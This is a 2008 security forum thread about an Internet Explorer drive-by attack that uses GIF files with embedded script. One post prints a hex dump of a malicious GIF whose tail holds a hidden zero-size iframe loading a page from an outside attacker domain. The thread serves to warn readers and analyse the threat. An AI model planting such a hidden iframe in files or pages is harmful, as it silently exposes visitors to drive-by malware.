-
June 27th, 2008, 08:03 PM
#1
IE Driveby Malware Attack: Beware those GIFs!
Sad part is that the vuln was reported ages ago...
Internet Explorer ‘feature’ causing drive-by malware attacks - ZDNet Zero Day Blog
The attack, discovered at a compromised legitimate site, is using a modified GIF file to exploit the cross-site scripting feature/vulnerability.
Schouwenberg said he reported the vulnerability to Microsoft a long time ago, warning the company that JavaScript embedded into GIF files can be executed under certain circumstances. Microsoft disagreed and the issue was never patched.
-
June 30th, 2008, 05:07 AM
#2
Cross site scripting flaws (in web applications alone) are so prevalent that I'd go as far as to say... who gives a crap.
Meanwhile, in another article on that site, Window Snyder was shrugging off multiple flaws that allowed full-on remote code execution in Firefox.
-
June 30th, 2008, 11:42 AM
#3
Perhaps we are starting to expect too much in the way of security from applications?
An application is a tool that is designed to provide functionality. The greater that functionality the greater the scope for misuse and abuse.
Whilst it is reasonable to expect due diligence from the development community, i feel that we are drifting into an "it wasn't me it was the cat wot done it" mentality.
Just look at commercially available security applications? Sniffers, keyloggers, password crackers and the like. Has anybody demanded "safe" versions of these?
I was in a local hardware store the other day, you know what? I didn't see a single "safe hammer", "safe chisel" or "safe screwdriver".
I would suggest that the only reasonable expectation of a tool is that it is capable of safely performing its basic functionality. Anything else and it is up to the user.
-
June 30th, 2008, 06:05 PM
#4
Code:
rcgreen@blue:~/Desktop$ hexcat oa_main.gif
00000000 - 47 49 46 38 39 61 a1 00 19 00 c4 00 00 35 35 58 GIF89a....�..55X
00000010 - 28 28 53 1a 1a 36 23 23 4a c1 19 1c 29 29 53 21 ((S..6##J�..))S!
00000020 - 21 44 86 1a 27 53 1a 2e 29 29 4c 2c 2c 55 61 24 !D..'S..))L,,Ua$
00000030 - 3a 5a 20 35 26 26 51 ee 18 15 d6 19 19 8e 21 2f :Z 5&&Q...�...!/
00000040 - 72 1c 2c c2 1a 20 2d 2d 50 3b 3b 5f 1e 1e 3f b3 r.,�. --P;;_..?�
00000050 - 1a 1f 2f 2f 57 26 26 45 40 40 63 3c 23 3d a4 1a ..//W&&E@@c<#=..
00000060 - 22 27 27 52 fd 18 13 25 25 4e 2e 1d 39 21 f9 04 "''R�..%%N..9!..
00000070 - 00 00 00 00 00 2c 00 00 00 00 a1 00 19 00 00 05 .....,..........
00000080 - ff 60 26 8e 19 65 9e 68 aa ae 29 e0 be 30 7c b9 .`&..e.h.�).�0|�
00000090 - 57 6d df 37 50 eb b4 8e ff 3f 85 70 48 1c 16 14 Wm�7P.�..?.pH...
000000a0 - 85 a4 72 c9 4c 06 02 9c 27 94 43 ad 46 a5 58 2c ..r�L...'.C.F.X,
000000b0 - d3 33 e8 7a bf e0 f0 d7 43 2e 37 ce 65 ae 78 cd �3.z�..�C.7�e�x
000000c0 - 0e a7 cf f0 b8 7c 4e af db ef 78 b8 75 6f cd 06 ..�.�|N��.x�uo�.
000000d0 - 4a 14 31 82 83 82 81 00 28 82 40 36 13 8c 8d 13 J.1.....(.@6....
000000e0 - 09 8f 8c 09 93 8e 13 8a 33 97 35 45 9b 9b 4d 9e ........3.5E..M.
000000f0 - 4c 52 51 7c 7d 7e 59 9f 0c 12 a9 aa ab 12 08 15 LRQ|}~Y.........
00000100 - 10 a9 11 15 06 b4 06 b0 12 0c 5e 69 64 5d 1f aa .....�.�..^id]..
00000110 - 11 b5 b4 aa 06 08 ac ac 10 15 15 a9 10 ba 64 79 .��..........�dy
00000120 - cf d0 d1 78 a3 7b a5 4f 10 1d d9 da db 1d 10 09 ���x.{.O..���...
00000130 - 12 da 10 8e e0 1d 0b 33 89 35 d8 d9 0f 93 94 da .�.....3.5��...
00000140 - 18 0b dc f2 18 18 d9 12 90 13 42 41 37 fa 9c 9c ..��..�...BA7...
00000150 - 47 9f 3e 05 28 30 10 ca 13 6a 55 ac 69 09 78 20 G.>.(0.�.jU.i.x
00000160 - 1b 81 03 10 21 12 c8 76 40 c0 44 6d ae 92 5d 64 ....!.�v@�Dm�.]d
00000170 - 30 cb 40 18 03 1f 1c 6c 93 95 ac 82 b6 0a 08 d6 0�@....l....�..
00000180 - ff 45 84 a8 4d 80 c9 0e 12 66 75 31 23 ad a6 cd .E..M.�..fu1#..
00000190 - 3b 08 13 2a 0c a0 ce 1b 3d 0c 09 7a 62 20 97 cd ;..*..�.=..zb .
000001a0 - 01 03 7a e4 16 e0 63 54 43 92 ba 07 eb 7e d6 cb ..z...cTC.�..~�
000001b0 - 66 80 81 c3 92 c9 4e be 94 00 14 9f 3f 05 17 be f..�.�N�....?..�
000001c0 - 12 09 48 96 20 96 9c a4 76 0e 24 1b a0 61 87 8a ..H. ...v.$..a..
000001d0 - 02 e2 0a 70 5b f1 22 d4 0e 0e 10 58 cc 96 b1 63 ...p[."�...X�.�c
000001e0 - ad 0a 21 b3 7d b8 1b 41 6e cb 94 1d 08 c8 8d db ..!�}�.An�...�.
000001f0 - 52 c0 55 5a 33 3d dc 9c 3c 19 ed 15 b5 3c b3 41 R�UZ3=�.<...�<�A
00000200 - 90 8a 41 dd 81 0a 17 23 dc 7d f0 61 a3 86 05 a8 ..A�...#�}.a....
00000210 - 51 6b 98 a4 2e 66 84 75 25 0f 3b 8c 40 a0 f6 c5 Qk...f.u%.;.@..
00000220 - 0e 2e ed 19 e8 7a 44 ec 3f 24 6c 95 14 94 52 e0 .....zD.?$l...R.
00000230 - 8a 65 9d 3b cb 62 a1 bb 78 2e c5 bd 1d f4 8e be .e.;�b.�x.Ž...�
00000240 - 8b c0 ad b6 cf 15 a8 c7 d5 ee 38 9b 00 c4 0f e5 .�.��..��.8..�..
00000250 - e1 16 20 92 40 32 8f 03 9c 51 5e ff cc 32 66 2c .. .@2...Q^.�2f,
00000260 - 42 a5 d2 05 9d 8d a3 06 91 db 18 58 d7 8c e1 b5 B.�......�.X�..�
00000270 - c3 da 77 99 f7 12 6e e0 0d 76 dd 01 85 ed 25 c1 ��w...n..v�...%
00000280 - ff 6e 1e 24 90 84 6f 42 94 15 d0 59 07 1d 87 9c .n.$..oB..�Y....
00000290 - 42 02 99 95 05 73 8b 31 77 91 5e df e1 c7 57 5c B....s.1w.^�.�W\
000002a0 - 58 25 73 97 78 d1 75 47 a0 43 db ad b3 58 04 07 X%s.x�uG.C�.�X..
000002b0 - b8 02 59 7a 92 b1 67 23 1d ee bd 47 9c 3a 28 be �.Yz.�g#..�G.:(�
000002c0 - a5 4c 7d 1d f9 57 df 6e f4 4c d2 9f 4a 2b 59 70 .L}..W�n.L�.J+Yp
000002d0 - d5 49 e0 b9 f4 c1 06 45 65 a4 5b 7a 0d 44 f1 20 �I.�.�.Ee.[z.D.
000002e0 - 70 00 49 d8 c4 13 c2 89 62 61 5a c9 79 62 8d 12 p.I��.�.baZ�yb..
000002f0 - fb 89 57 d7 88 72 09 d9 17 56 84 35 f7 01 46 b2 ..W�.r.�.V.5..F�
00000300 - 25 b6 18 94 78 c9 a2 1b 7a 34 dd 78 63 8e 3a ae %�..x�..z4�xc.:�
00000310 - 95 c4 04 a9 05 8a 1a 03 47 61 c0 80 6a 9c 11 ba .�......Ga�.j..�
00000320 - 80 06 45 b6 93 40 6a 18 04 43 0b 02 84 6a 40 28 ..E�.@j..C...j@(
00000330 - 03 20 11 8a 80 a4 97 6e 7a 29 8d 0d 68 09 ca 12 . .....nz)..h.�.
00000340 - 1c 98 f5 25 9f 18 fa e9 04 86 4b 0c 40 4b 89 b0 ...%......K.@K.�
00000350 - c6 0a ab a4 92 ca 6a eb ad 7e a1 47 63 8d 7a b2 �....�j..~.Gc.z�
00000360 - 87 ea 7b 4d 48 e2 68 3b 5d 0d 6b ec b1 8f 18 eb ..{MH.h;].k.�...
00000370 - 01 67 52 0d 80 41 1b cf 36 e3 0c 15 04 09 b7 a5 .gR..A.�6.....�.
00000380 - d3 29 15 1a 77 2a 42 98 39 a1 61 98 4c 7c 41 6b �)..w*B.9.a.L|Ak
00000390 - 30 6d 94 db c6 b8 ba 9a 1b 99 7a bd 56 f6 ab 5a 0m.�Ƹ�...z�V..Z
000003a0 - 01 69 e2 c8 52 13 14 c0 c8 11 8c fc e6 8f 27 0e .i.�R..��..
000003b0 - 4e d2 40 3b 67 00 cc 41 03 35 f2 7a 06 15 c4 79 N�@;g.�A.5�z..�y
000003c0 - ab 44 a9 03 31 ec 25 c2 db e6 a4 96 95 c4 c1 1b .D..1.%��....��.
000003d0 - 50 1a 6c ec a2 f1 c6 1c 77 ec f1 c7 79 b6 6b d3 P.l...�.w..�y�k
000003e0 - bb 16 c7 0b 56 58 fe a0 0c e1 3f 4b 44 b8 c4 5a �.�.VX....?KD��Z
000003f0 - 5c c2 1c f3 14 d5 d2 bc 6a c3 09 1b 14 f1 a9 3b \�.�.�Ҽj�.....;
00000400 - 51 7b b3 16 7e 48 28 c7 c6 22 17 6d 74 4d 24 83 Q{�.~H(��".mtM$.
00000410 - 4b 16 3f 61 a9 bc 72 6f 2e 8f 05 1c 96 a2 56 6b K.?a.�ro......Vk
00000420 - b5 d5 36 27 04 f1 ce 11 fb a1 f5 65 3a 8a 7a f4 ��6'..�....e:.z.
00000430 - d8 64 23 9d f4 98 55 17 e1 b4 58 bd 3d e8 76 d5 �d#...U..�X�=.v
00000440 - 2f 5f 5b ca c3 53 4c 51 0d d7 96 35 e0 75 28 60 /_[��SLQ.�.5.u(`
00000450 - 03 0b 77 08 00 3b 0d 0a 3c 69 66 72 61 6d 65 20 ..w..;..<iframe
00000460 - 73 72 63 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 67 src=http://www.g
00000470 - 6f 6c 64 77 69 6e 64 6f 73 32 30 30 30 2e 63 6f oldwindos2000.co
00000480 - 6d 2f 68 6b 65 72 61 6f 6e 65 2f 68 6b 65 72 2e m/hkeraone/hker.
00000490 - 68 74 6d 20 77 69 64 68 74 3d 30 20 68 65 69 67 htm widht=0 heig
000004a0 - 68 74 3d 30 3e 3c 2f 69 66 72 61 6d 65 3e ht=0></iframe>
rcgreen@blue:~/Desktop$
It's on a site named grooveradio dot com. The usual cautions
apply. Don't view it with Internet Explorer.
Last edited by rcgreen; June 30th, 2008 at 06:08 PM.
I came in to the world with nothing. I still have most of it.
Similar Threads
-
By Tedob1 in forum Cosmos
Replies: 9
Last Post: May 7th, 2006, 05:06 AM
-
By qod in forum The Security Tutorials Forum
Replies: 6
Last Post: February 27th, 2004, 03:03 AM
-
By NullDevice in forum The Security Tutorials Forum
Replies: 21
Last Post: December 17th, 2003, 10:03 PM
-
By Striek in forum The Security Tutorials Forum
Replies: 10
Last Post: December 16th, 2003, 09:30 PM
-
By VLaD tHEiMpALeR in forum Programming Security
Replies: 0
Last Post: July 18th, 2002, 03:51 PM
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|